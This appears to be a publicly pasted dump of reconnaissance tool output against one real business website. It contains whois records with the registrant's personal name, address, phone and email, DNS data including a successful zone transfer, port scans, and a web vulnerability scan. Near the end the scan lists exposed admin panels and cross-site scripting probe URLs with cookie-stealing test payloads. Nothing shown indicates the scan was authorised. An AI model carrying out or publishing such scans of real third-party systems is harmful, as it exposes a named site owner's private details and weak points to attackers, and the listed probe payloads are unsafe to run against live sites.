· 7 years ago · Jan 23, 2019, 11:30 AM
1#######################################################################################################################################
2Hostname babylon-woodline.co.il ISP 013 NetVision Ltd
3Continent Asia Flag
4IL
5Country Israel Country Code IL
6Region Unknown Local time 23 Jan 2019 11:15 IST
7City Unknown Postal Code Unknown
8IP Address 62.90.134.182 Latitude 31.5
9#######################################################################################################################################
10> babylon-woodline.co.il
11Server: 194.187.251.67
12Address: 194.187.251.67#53
13
14Non-authoritative answer:
15Name: babylon-woodline.co.il
16Address: 62.90.134.182
17>
18#######################################################################################################################################
19
20HostIP:62.90.134.182
21HostName:babylon-woodline.co.il
22
23Gathered Inet-whois information for 62.90.134.182
24--------------------------------------------------------------------------------------------------------------------------------------
25
26
27inetnum: 62.90.0.0 - 62.90.255.255
28netname: IL-NETVISION-20000801
29country: IL
30org: ORG-NL5-RIPE
31admin-c: NVAD-RIPE
32tech-c: NVAD-RIPE
33status: ALLOCATED PA
34mnt-by: RIPE-NCC-HM-MNT
35mnt-by: NV-MNT-RIPE
36mnt-lower: NV-MNT-RIPE
37mnt-routes: NV-MNT-RIPE
38created: 2001-12-17T10:50:31Z
39last-modified: 2016-08-24T11:01:56Z
40source: RIPE # Filtered
41
42organisation: ORG-NL5-RIPE
43org-name: 013 NetVision Ltd
44org-type: LIR
45address: 10 Hagavish st.
46address: 4250708
47address: Netanya
48address: ISRAEL
49phone: +972529989933
50fax-no: +97248550454
51abuse-c: AR15573-RIPE
52mnt-ref: RIPE-NCC-HM-MNT
53mnt-ref: NV-MNT-RIPE
54mnt-by: RIPE-NCC-HM-MNT
55mnt-by: NV-MNT-RIPE
56created: 2004-04-17T11:27:52Z
57last-modified: 2018-12-19T10:42:36Z
58source: RIPE # Filtered
59
60person: Ripe Admin - 013 Netvision
61address: Matam, Haifa
62address: Israel
63phone: +972-4-8560454
64nic-hdl: NVAD-RIPE
65created: 2009-10-13T07:36:13Z
66last-modified: 2017-10-30T22:07:16Z
67source: RIPE # Filtered
68mnt-by: NV-MNT-RIPE
69
70% Information related to '62.90.0.0/16AS1680'
71
72route: 62.90.0.0/16
73descr: 013 Netvision Network
74origin: AS1680
75mnt-by: NV-MNT-RIPE
76created: 2009-03-26T10:21:42Z
77last-modified: 2009-03-26T10:21:42Z
78source: RIPE
79
80% This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
81
82
83
84Gathered Inic-whois information for babylon-woodline.co.il
85---------------------------------------------------------------------------------------------------------------------------------------
86domain: babylon-woodline.co.il
87
88descr: daniel ovadia
89descr: mezada 3
90descr: hodhasron
91descr: 4529414
92descr: Israel
93phone: +972 2 2601060
94e-mail: web4id AT gmail.com
95admin-c: GI-DO2301-IL
96tech-c: GI-DO2301-IL
97zone-c: GI-DO2301-IL
98nserver: ns1.webid.co.il
99nserver: ns2.webid.co.il
100validity: 19-08-2019
101DNSSEC: unsigned
102status: Transfer Locked
103changed: domain-registrar AT isoc.org.il 20180819 (Assigned)
104
105person: daniel ovadia
106address mezada 3
107address hod hasron
108address 4529414
109address Israel
110phone: +972 2 2601060
111e-mail: web4id AT gmail.com
112nic-hdl: GI-DO2301-IL
113changed: domain-registrar AT isoc.org.il 20180819
114
115registrar name: Gorni Interactive Ltd
116registrar info: http://www.box.co.il/
117
118% Rights to the data above are restricted by copyright.
119
120Gathered Netcraft information for babylon-woodline.co.il
121---------------------------------------------------------------------------------------------------------------------------------------
122
123Retrieving Netcraft.com information for babylon-woodline.co.il
124Netcraft.com Information gathered
125
126Gathered Subdomain information for babylon-woodline.co.il
127---------------------------------------------------------------------------------------------------------------------------------------
128Searching Google.com:80...
129Searching Altavista.com:80...
130Found 0 possible subdomain(s) for host babylon-woodline.co.il, Searched 0 pages containing 0 results
131
132Gathered E-Mail information for babylon-woodline.co.il
133--------------------------------------------------------------------------------------------------------------------------------------
134Searching Google.com:80...
135Searching Altavista.com:80...
136Found 0 E-Mail(s) for host babylon-woodline.co.il, Searched 0 pages containing 0 results
137
138Gathered TCP Port information for 62.90.134.182
139---------------------------------------------------------------------------------------------------------------------------------------
140
141 Port State
142
14321/tcp open
14453/tcp open
14580/tcp open
146110/tcp open
147143/tcp open
148
149Portscan Finished: Scanned 150 ports, 143 ports were in state closed
150#######################################################################################################################################
151[i] Scanning Site: http://babylon-woodline.co.il
152
153
154
155B A S I C I N F O
156=======================================================================================================================================
157
158
159[+] Site Title: ×ž×–×¨×•× ×™× ×œ×™×™×Ÿ
160[+] IP address: 62.90.134.182
161[+] Web Server: Could Not Detect
162[+] CMS: Could Not Detect
163[+] Cloudflare: Not Detected
164[+] Robots File: Found
165
166-------------[ contents ]----------------
167User-agent: *
168Allow: /
169-----------[end of contents]-------------
170
171
172
173W H O I S L O O K U P
174=======================================================================================================================================
175
176
177% The data in the WHOIS database of the .il registry is provided
178% by ISOC-IL for information purposes, and to assist persons in
179% obtaining information about or related to a domain name
180% registration record. ISOC-IL does not guarantee its accuracy.
181% By submitting a WHOIS query, you agree that you will use this
182% Data only for lawful purposes and that, under no circumstances
183% will you use this Data to: (1) allow, enable, or otherwise
184% support the transmission of mass unsolicited, commercial
185% advertising or solicitations via e-mail (spam);
186% or (2) enable high volume, automated, electronic processes that
187% apply to ISOC-IL (or its systems).
188% ISOC-IL reserves the right to modify these terms at any time.
189% By submitting this query, you agree to abide by this policy.
190
191query: babylon-woodline.co.il
192
193reg-name: babylon-woodline
194domain: babylon-woodline.co.il
195
196descr: daniel ovadia
197descr: mezada 3
198descr: hodhasron
199descr: 4529414
200descr: Israel
201phone: +972 2 2601060
202e-mail: web4id AT gmail.com
203admin-c: GI-DO2301-IL
204tech-c: GI-DO2301-IL
205zone-c: GI-DO2301-IL
206nserver: ns1.webid.co.il
207nserver: ns2.webid.co.il
208validity: 19-08-2019
209DNSSEC: unsigned
210status: Transfer Locked
211changed: domain-registrar AT isoc.org.il 20180819 (Assigned)
212
213person: daniel ovadia
214address mezada 3
215address hod hasron
216address 4529414
217address Israel
218phone: +972 2 2601060
219e-mail: web4id AT gmail.com
220nic-hdl: GI-DO2301-IL
221changed: domain-registrar AT isoc.org.il 20180819
222
223registrar name: Gorni Interactive Ltd
224registrar info: http://www.box.co.il/
225
226% Rights to the data above are restricted by copyright.
227
228
229
230
231G E O I P L O O K U P
232=======================================================================================================================================
233
234[i] IP Address: 62.90.134.182
235[i] Country: Israel
236[i] State:
237[i] City:
238[i] Latitude: 31.5
239[i] Longitude: 34.75
240
241
242
243
244H T T P H E A D E R S
245=======================================================================================================================================
246
247
248[i] HTTP/1.1 301 Moved Permanently
249[i] Date: Wed, 23 Jan 2019 09:21:56 GMT
250[i] Content-Type: text/html; charset=utf-8
251[i] Content-Length: 0
252[i] Location: /index.1.html
253[i] Vary: User-Agent
254[i] Connection: close
255[i] HTTP/1.1 200 OK
256[i] Date: Wed, 23 Jan 2019 09:21:57 GMT
257[i] Content-Type: text/html; charset=utf-8
258[i] Vary: Accept-Encoding,User-Agent
259[i] Connection: close
260
261
262
263
264D N S L O O K U P
265=======================================================================================================================================
266
267babylon-woodline.co.il. 14399 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
268babylon-woodline.co.il. 14399 IN MX 10 mail.babylon-woodline.co.il.
269babylon-woodline.co.il. 14399 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
270babylon-woodline.co.il. 14399 IN NS ns2.webid.co.il.
271babylon-woodline.co.il. 14399 IN NS ns1.webid.co.il.
272babylon-woodline.co.il. 14399 IN A 62.90.134.182
273
274
275
276
277S U B N E T C A L C U L A T I O N
278=======================================================================================================================================
279
280Address = 62.90.134.182
281Network = 62.90.134.182 / 32
282Netmask = 255.255.255.255
283Broadcast = not needed on Point-to-Point links
284Wildcard Mask = 0.0.0.0
285Hosts Bits = 0
286Max. Hosts = 1 (2^0 - 0)
287Host Range = { 62.90.134.182 - 62.90.134.182 }
288
289
290
291N M A P P O R T S C A N
292=======================================================================================================================================
293
294
295Starting Nmap 7.40 ( https://nmap.org ) at 2019-01-23 09:21 UTC
296Nmap scan report for babylon-woodline.co.il (62.90.134.182)
297Host is up (0.13s latency).
298rDNS record for 62.90.134.182: server.webid.co.il
299PORT STATE SERVICE
30021/tcp open ftp
30122/tcp filtered ssh
30223/tcp closed telnet
30380/tcp open http
304110/tcp open pop3
305143/tcp open imap
306443/tcp open https
3073389/tcp closed ms-wbt-server
308
309Nmap done: 1 IP address (1 host up) scanned in 1.77 seconds
310
311
312
313S U B - D O M A I N F I N D E R
314========================================================================================================================================
315
316
317[i] Total Subdomains Found : 1
318
319[+] Subdomain: www.babylon-woodline.co.il
320[-] IP: 62.90.134.182
321#######################################################################################################################################
322[?] Enter the target: example( http://domain.com )
323http://babylon-woodline.co.il/index.1.html
324[!] IP Address : 62.90.134.182
325[!] babylon-woodline.co.il doesn't seem to use a CMS
326[+] Honeypot Probabilty: 30%
327---------------------------------------------------------------------------------------------------------------------------------------
328[~] Trying to gather whois information for babylon-woodline.co.il
329[+] Whois information found
330[-] Unable to build response, visit https://who.is/whois/babylon-woodline.co.il
331---------------------------------------------------------------------------------------------------------------------------------------
332PORT STATE SERVICE
33321/tcp open ftp
33422/tcp filtered ssh
33523/tcp closed telnet
33680/tcp open http
337110/tcp open pop3
338143/tcp open imap
339443/tcp open https
3403389/tcp closed ms-wbt-server
341Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
342---------------------------------------------------------------------------------------------------------------------------------------
343
344[+] DNS Records
345ns1.webid.co.il. (62.90.134.182) AS1680 013 NetVision Ltd Israel
346ns2.webid.co.il. (212.150.246.99) AS1680 013 NetVision Ltd Israel
347
348[+] MX Records
34910 (62.90.134.182) AS1680 013 NetVision Ltd Israel
350
351[+] Host Records (A)
352mail.babylon-woodline.co.ilHTTP: (server.webid.co.il) (62.90.134.182) AS1680 013 NetVision Ltd Israel
353www.babylon-woodline.co.ilHTTP: (server.webid.co.il) (62.90.134.182) AS1680 013 NetVision Ltd Israel
354
355[+] TXT Records
356"v=spf1 a mx ip4:62.90.134.182 ~all"
357
358[+] DNS Map: https://dnsdumpster.com/static/map/babylon-woodline.co.il.png
359
360[>] Initiating 3 intel modules
361[>] Loading Alpha module (1/3)
362[>] Beta module deployed (2/3)
363[>] Gamma module initiated (3/3)
364No emails found
365
366[+] Hosts found in search engines:
367---------------------------------------------------------------------------------------------------------------------------------------
368[-] Resolving hostnames IPs...
36962.90.134.182:www.babylon-woodline.co.il
370[+] Virtual hosts:
371--------------------------------------------------------------------------------------------------------------------------------------
372#######################################################################################################################################
373 <<>> DiG 9.11.5-P1-1-Debian <<>> babylon-woodline.co.il
374;; global options: +cmd
375;; Got answer:
376;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9587
377;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
378
379;; OPT PSEUDOSECTION:
380; EDNS: version: 0, flags:; udp: 4096
381;; QUESTION SECTION:
382;babylon-woodline.co.il. IN A
383
384;; ANSWER SECTION:
385babylon-woodline.co.il. 13270 IN A 62.90.134.182
386
387;; Query time: 195 msec
388;; SERVER: 194.187.251.67#53(194.187.251.67)
389;; WHEN: mer jan 23 04:33:35 EST 2019
390;; MSG SIZE rcvd: 67
391#######################################################################################################################################
392; <<>> DiG 9.11.5-P1-1-Debian <<>> +trace babylon-woodline.co.il
393;; global options: +cmd
394. 79459 IN NS d.root-servers.net.
395. 79459 IN NS i.root-servers.net.
396. 79459 IN NS h.root-servers.net.
397. 79459 IN NS e.root-servers.net.
398. 79459 IN NS l.root-servers.net.
399. 79459 IN NS b.root-servers.net.
400. 79459 IN NS g.root-servers.net.
401. 79459 IN NS f.root-servers.net.
402. 79459 IN NS j.root-servers.net.
403. 79459 IN NS m.root-servers.net.
404. 79459 IN NS k.root-servers.net.
405. 79459 IN NS a.root-servers.net.
406. 79459 IN NS c.root-servers.net.
407. 79459 IN RRSIG NS 8 0 518400 20190205050000 20190123040000 16749 . BjuPr9Wtn9W9+vjQuS+mCRtw0GlXadQUTZqWzyZaC3F69/qrZtLxkRDe u4CfiNpk+6Fr3WMHjEKjYCsXzZCnSjzS76IJSxNr5PPAIwkZ7qhoGcTi jQTCL0BBrNJa7FD29nPJ/pr3ljArReL3k4Gi/h/d1AJdOYNz5eXFzcRI l4YrdXsG6gMY3JmksoE/EDh9vp+BYwga3ZMv72ptER/BYcr2KqCKYK3V QMlr+kvO+s32m93OAOaqrtfBQZAAt0lqwGtU+tv0H0arV1LzcR6VZ3Yw XlHG1B6MybqD4BsXJOhyAEBq5e9TkjQcsz475DWKobsGTbFzK4MnKVC6 pPkqjg==
408;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 193 ms
409
410il. 172800 IN NS lookup.iucc.ac.il.
411il. 172800 IN NS ns2.ns.il.
412il. 172800 IN NS ns3.ns.il.
413il. 172800 IN NS nsa.ns.il.
414il. 172800 IN NS nsb.ns.il.
415il. 172800 IN NS nse.ns.il.
416il. 172800 IN NS ilns.ilan.net.il.
417il. 172800 IN NS ns1.ns.il.
418il. 172800 IN NS sns-pb.isc.org.
419il. 86400 IN DS 44729 8 2 7FA5A2FD091C340D4A01864B4F82D66D0769F3D3A0A1C48F8ABD2A64 B1689921
420il. 86400 IN RRSIG DS 8 1 86400 20190205050000 20190123040000 16749 . SQOU99Bum6R/ILTSFLCF9NuR8m8hX0LaLDWcYPRhbjJ91HXADNIuLyAu E/6tzXAjXOLtEkHUFglopUAZ4bSl7CKaRilthsWiXwOipsRtfBqzjUWx THK1gJtOi+CIaZ5dOLvw5mrK/ks5V9vHL64nctmtl4aiPHEMS2SvmslH O0ekd1U5Urcvb0Q14R9OloM5+q86XLXEM51NESFLG040/HSbviWnj68i MT3jaC3J+GUmV9s218eYrAc7VfhPeU4xr7s4g+gmtxDc7zxlIBd4TFRg 6UsATmDjSMCrWnryhQIth+9V5j2LMw6MUpo0PskaEpACIZsC+bfzMelI 0LruNg==
421;; Received 866 bytes from 2001:500:a8::e#53(e.root-servers.net) in 27 ms
422
423babylon-woodline.co.il. 86400 IN NS ns1.webid.co.il.
424babylon-woodline.co.il. 86400 IN NS ns2.webid.co.il.
425i4ng30e6ho1oogjus9gnuf4ho8qjr729.co.il. 86400 IN NSEC3 1 1 10 7CE12AF346933CF2 I808NA34LO7Q55K3FAOBFSHSVU39TF9J NS SOA RRSIG DNSKEY NSEC3PARAM
426i4ng30e6ho1oogjus9gnuf4ho8qjr729.co.il. 86400 IN RRSIG NSEC3 8 3 86400 20190223080907 20190123070907 7233 co.il. Ygz6zcCwHg8HGE8yIWZcrQ/krSkly54AKHIpxi8COxDQCVo6IuhHw7VU nZhYZ9NJebX4BrnBmYUKTUBnnXDYsXM9CZafaO+5r5QrKLJGd7rSUrSh Gh1FFVjIqBiQhSS8lT/nrVdxMI85R/5wxe288XIf9QhEZDojT9+d8FQf OMG1Qy/khCWia02SNC4/Sgr5t4PqriIb9ItOD858JaCZBZ9pkR/XU1NM mwU/6jw+sabF17i35QuWHct0ZKW9ERrFfRO9s8NeniuNYrKcuTlH6EUl Hk6X1+GWEzkU3vZu5LgayNLMuUTSH6b9dlQJlaWVZvNO933vC0ipic5h x4pmHA==
4279bpjm4r164qdueicm4kbr4kanmot6n7s.co.il. 86400 IN NSEC3 1 1 10 7CE12AF346933CF2 C2FULIBVA4GGAM91K16PHT5CA62MJPF3 NS DS RRSIG
4289bpjm4r164qdueicm4kbr4kanmot6n7s.co.il. 86400 IN RRSIG NSEC3 8 3 86400 20190223080907 20190123070907 7233 co.il. aR3RlfUG9KMhJ2R9LDiouTDywVUd/8gfXuVSgJxPZqe9hxfzuIAA78n7 sfj/KdaA5JA4as9IjtDc/89lr8aHsm4tWz+HkGnm104Q8ewbg9W/a8ib 0A1ZRCQrfkeDYVvfAAwcbjO4XTggXyzpU426hsePRmUz6y9gb07jswkp mALq3pMV05mb+YqJEgmG7koxXRX80H30/9UdMF+C8nrTVyPqCrEA7ErW eBpEnvnLyz4hmjSlt4DijBNp4TOolc+7cMOtOcxymJFO48aZSbVBRBR9 p5vYQy6paIqJE7hDQ19KVllQe3XNox/PmOi7Lhc9ohuT7gGorRT1gfhG Fiwj2A==
429;; Received 914 bytes from 2001:678:e:103::53#53(ns3.ns.il) in 76 ms
430
431babylon-woodline.co.il. 14400 IN A 62.90.134.182
432babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
433babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
434;; Received 141 bytes from 212.150.246.99#53(ns2.webid.co.il) in 231 ms
435######################################################################################################################################
436[*] Performing General Enumeration of Domain: babylon-woodline.co.il
437[-] DNSSEC is not configured for babylon-woodline.co.il
438[*] SOA ns1.webid.co.il 62.90.134.182
439[*] NS ns2.webid.co.il 212.150.246.99
440[*] Bind Version for 212.150.246.99 9.9.4-RedHat-9.9.4-61.el7
441[*] NS ns1.webid.co.il 62.90.134.182
442[*] Bind Version for 62.90.134.182 9.9.4-RedHat-9.9.4-61.el7
443[*] MX mail.babylon-woodline.co.il 62.90.134.182
444[*] A babylon-woodline.co.il 62.90.134.182
445[*] TXT babylon-woodline.co.il v=spf1 a mx ip4:62.90.134.182 ~all
446[*] TXT _domainkey.babylon-woodline.co.il o=~
447[*] Enumerating SRV Records
448[-] No SRV Records Found for babylon-woodline.co.il
449[+] 0 Records Found
450#######################################################################################################################################
451Traceroute 'babylon-woodline.co.il'
452---------------------------------------------------------------------------------------------------------------------------------------
453
454Start: 2019-01-23T09:36:47+0000
455HOST: web01 Loss% Snt Last Avg Best Wrst StDev
456 1.|-- 45.79.12.202 0.0% 3 0.8 0.8 0.7 0.9 0.1
457 2.|-- 45.79.12.6 0.0% 3 0.4 1.2 0.4 2.2 0.9
458 3.|-- dls-b22-link.telia.net 0.0% 3 2.9 1.9 0.8 2.9 1.0
459 4.|-- atl-b22-link.telia.net 0.0% 3 18.6 18.6 18.6 18.6 0.0
460 5.|-- ash-bb4-link.telia.net 0.0% 3 45.4 48.0 45.4 50.8 2.7
461 6.|-- prs-bb3-link.telia.net 0.0% 3 140.8 140.7 140.4 140.8 0.2
462 7.|-- ldn-bb3-link.telia.net 0.0% 3 126.4 126.9 125.7 128.7 1.6
463 8.|-- ldn-b4-link.telia.net 0.0% 3 126.4 128.1 126.4 130.4 2.1
464 9.|-- ldn-bb4-link.telia.net 33.3% 3 129.4 127.6 125.8 129.4 2.5
465 10.|-- ldn-b4-link.telia.net 0.0% 3 125.7 126.1 125.7 127.0 0.7
466 11.|-- netvision-ic-304535.c.telia.net 0.0% 3 124.5 125.1 124.5 125.8 0.6
467 12.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
468 13.|-- gw2-2-0-5-hfa-gw2-lnd.nv.net.il 0.0% 3 194.8 195.3 194.8 196.1 0.7
469 14.|-- core1-0-1-0-2-gw2.hfa.nv.net.il 0.0% 3 193.1 192.3 191.8 193.1 0.7
470 15.|-- core1-rha2-0-0-core1-hfa.nv.net.il 0.0% 3 191.0 190.8 190.4 191.0 0.4
471 16.|-- po221.srvc3.rha.nv.net.il 0.0% 3 192.5 193.6 192.5 194.6 1.0
472 17.|-- 82-166-37-254.barak-online.net 0.0% 3 199.7 199.1 196.8 200.7 2.0
473 18.|-- 62-90-134-178.barak.net.il 0.0% 3 196.6 196.9 196.6 197.2 0.3
474 19.|-- server.webid.co.il 0.0% 3 218.0 215.0 213.3 218.0 2.6
475#######################################################################################################################################
476[*] Processing domain babylon-woodline.co.il
477[*] Using system resolvers ['194.187.251.67', '185.93.180.131', '83.143.245.42', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
478[+] Getting nameservers
479212.150.246.99 - ns2.webid.co.il
480[+] Zone transfer sucessful using nameserver ns2.webid.co.il
481babylon-woodline.co.il. 14400 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
482babylon-woodline.co.il. 14400 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
483babylon-woodline.co.il. 14400 IN MX 10 mail.babylon-woodline.co.il.
484babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
485babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
486babylon-woodline.co.il. 14400 IN A 62.90.134.182
487_domainkey.babylon-woodline.co.il. 14400 IN TXT "o=~"
488x._domainkey.babylon-woodline.co.il. 14400 IN TXT "v=DKIM1; k=rsa; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnPngW+NT8sgdpBM2YWoyLd7AkZ0vpm6fgtyACNiOhtVCvGy+KE1IoShdqPcCDt3G6L5pa6gJo9kfxkX4bO1niE8" "dGIirGFgqy4dixwIZ1FYBEOLzND9S+Izh5G6NOkq22FcrTwPIfTTDnZTsR7UhuQMtXa4EflM43kXjBaM/l1tIXW3kuCOnW3kzm8d00KJZYdM4CWFOSiQyvg1wrjaI+VYuMY1Io4V3ytpscEjb1kJo1" "JKDWhek+ZIuGim5sDv18a16Ho7/OnGUctWL00MDQ3cqm4w0bqI1fnjAI+v2R/OpHmZPXL1ddJRlSSLspnqgionlZ+FBO5DLPBkhrttJ8QIDAQAB"
489ftp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
490mail.babylon-woodline.co.il. 14400 IN A 62.90.134.182
491pop.babylon-woodline.co.il. 14400 IN A 62.90.134.182
492smtp.babylon-woodline.co.il. 14400 IN A 62.90.134.182
493www.babylon-woodline.co.il. 14400 IN A 62.90.134.182
494#######################################################################################################################################
495Port État Service
49621/tcp open ftp
49753/tcp open domain
49880/tcp open http
499110/tcp open pop3
500143/tcp open imap
501443/tcp open https
502465/tcp open smtps
503587/tcp open submission
504993/tcp open imaps
505995/tcp open pop3s
5062000/tcp open cisco-sccp
5072222/tcp open EtherNetIP-1
5083306/tcp open mysql
5095060/tcp open sip
5108080/tcp open http-proxy
5118081/tcp open blackice-icecap
512#######################################################################################################################################
513Source TTL Type d'adresse Type d'enregistrement Résolution
514babylon-woodline.co.il. 14400 IN SOA ns1.webid.co.il. hostmaster.babylon-woodline.co.il. 2018081901 14400 3600 1209600 86400
515babylon-woodline.co.il. 14400 IN NS ns2.webid.co.il.
516babylon-woodline.co.il. 14400 IN A 62.90.134.182
517babylon-woodline.co.il. 14400 IN TXT "v=spf1 a mx ip4:62.90.134.182 ~all"
518babylon-woodline.co.il. 14400 IN NS ns1.webid.co.il.
519babylon-woodline.co.il. 14400 IN MX mail.babylon-woodline.co.il. (10)
520#######################################################################################################################################
521 "www.babylon-woodline.co.il",
522 "ftp.babylon-woodline.co.il",
523 "pop.babylon-woodline.co.il",
524 "smtp.babylon-woodline.co.il",
525 "x._domainkey.babylon-woodline.co.il",
526 "mail.babylon-woodline.co.il",
527 "_domainkey.babylon-woodline.co.il"
528]
529+ resolving target: YES
530- scaning for subdomain...
531
532Ip Address Status Type Domain Name Server
533---------- ------ ---- ----------- ------
53462.90.134.182 200 host ftp.babylon-woodline.co.il nginx
53562.90.134.182 200 host mail.babylon-woodline.co.il nginx
53662.90.134.182 200 host pop.babylon-woodline.co.il nginx
53762.90.134.182 200 host smtp.babylon-woodline.co.il nginx
53862.90.134.182 301 host www.babylon-woodline.co.il nginx
539#######################################################################################################################################
540[+] Testing domain
541 www.babylon-woodline.co.il 62.90.134.182
542[+] Dns resolving
543 Domain name Ip address Name server
544 babylon-woodline.co.il 62.90.134.182 server.webid.co.il
545Found 1 host(s) for babylon-woodline.co.il
546[+] Testing wildcard
547 Ok, no wildcard found.
548
549[+] Scanning for subdomain on babylon-woodline.co.il
550[!] Wordlist not specified. I scannig with my internal wordlist...
551 Estimated time about 127.8 seconds
552
553 Subdomain Ip address Name server
554
555ftp.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
556mail.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
557pop.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
558smtp.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
559www.babylon-woodline.co.il 62.90.134.182 server.webid.co.il
560#######################################################################################################################################
561=======================================================================================================================================
562| E-mails:
563| [+] E-mail Found: mike@hyperreal.org
564| [+] E-mail Found: webmaster@babylon-woodline.co.il
565| [+] E-mail Found: humbedooh@apache.org
566| [+] E-mail Found: kevinh@kevcom.com
567=======================================================================================================================================
568| External hosts:
569| [+] External Host Found: http://httpd.apache.org
570| [+] External Host Found: http://html5shiv.googlecode.com
571=======================================================================================================================================
572#######################################################################################################################################
573--------------------------------------------------------------------------------------------------------------------------------------
574+ Target IP: 62.90.134.182
575+ Target Hostname: 62.90.134.182
576+ Target Port: 443
577--------------------------------------------------------------------------------------------------------------------------------------
578+ SSL Info: Subject: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
579 Ciphers: ECDHE-RSA-AES128-GCM-SHA256
580 Issuer: /C=US/ST=Someprovince/L=Sometown/O=none/OU=none/CN=localhost/emailAddress=webmaster@localhost
581+ Start Time: 2019-01-23 04:21:17 (GMT-5)
582---------------------------------------------------------------------------------------------------------------------------------------
583+ Server: nginx
584+ Server leaks inodes via ETags, header found with file /, fields: 0x2b 0x56ee9136e8a00
585+ The anti-clickjacking X-Frame-Options header is not present.
586+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
587+ Uncommon header 'x-accel-version' found, with contents: 0.01
588+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
589+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
590+ The Content-Encoding header is set to "deflate" this may mean that the server is vulnerable to the BREACH attack.
591+ Hostname '62.90.134.182' does not match certificate's names: localhost
592+ Uncommon header 'x-ob_mode' found, with contents: 1
593+ Uncommon header 'x-robots-tag' found, with contents: noindex, nofollow
594+ Uncommon header 'referrer-policy' found, with contents: no-referrer
595+ Uncommon header 'x-permitted-cross-domain-policies' found, with contents: none
596+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
597+ Cookie SQMSESSID created without the secure flag
598+ Cookie SQMSESSID created without the httponly flag
599+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
600+ OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
601+ OSVDB-3268: /icons/: Directory indexing found.
602+ OSVDB-3233: /icons/README: Apache default file found.
603---------------------------------------------------------------------------------------------------------------------------------------
604######################################################################################################################################
605--------------------------------------------------------------------------------------------------------------------------------------
606+ Target IP: 62.90.134.182
607+ Target Hostname: babylon-woodline.co.il
608+ Target Port: 80
609+ Start Time: 2019-01-23 04:21:22 (GMT-5)
610---------------------------------------------------------------------------------------------------------------------------------------
611+ Server: No banner retrieved
612+ The anti-clickjacking X-Frame-Options header is not present.
613+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
614+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
615+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
616+ Multiple index files found: /index.1.html/index.do, /index.1.html/index.asp, /index.1.html/index.cfm, /index.1.html/index.shtml, /index.1.html/index.php, /index.1.html/index.htm, /index.1.html/index.xml, /index.1.html/index.php3, /index.1.html/index.jhtml, /index.1.html/index.cgi, /index.1.html/index.pl, /index.1.html/index.aspx
617+ Server banner has changed from '' to 'nginx' which may suggest a WAF, load balancer or proxy is in place
618+ OSVDB-7501: /index.1.html/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
619+ /index.1.html/index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
620+ OSVDB-7505: /index.1.html/emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
621+ OSVDB-7504: /index.1.html/emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
622+ OSVDB-7503: /index.1.html/emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
623+ /index.1.html/administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
624+ OSVDB-7495: /index.1.html/administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
625+ OSVDB-7498: /index.1.html/administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
626+ OSVDB-7499: /index.1.html/administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script>: Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
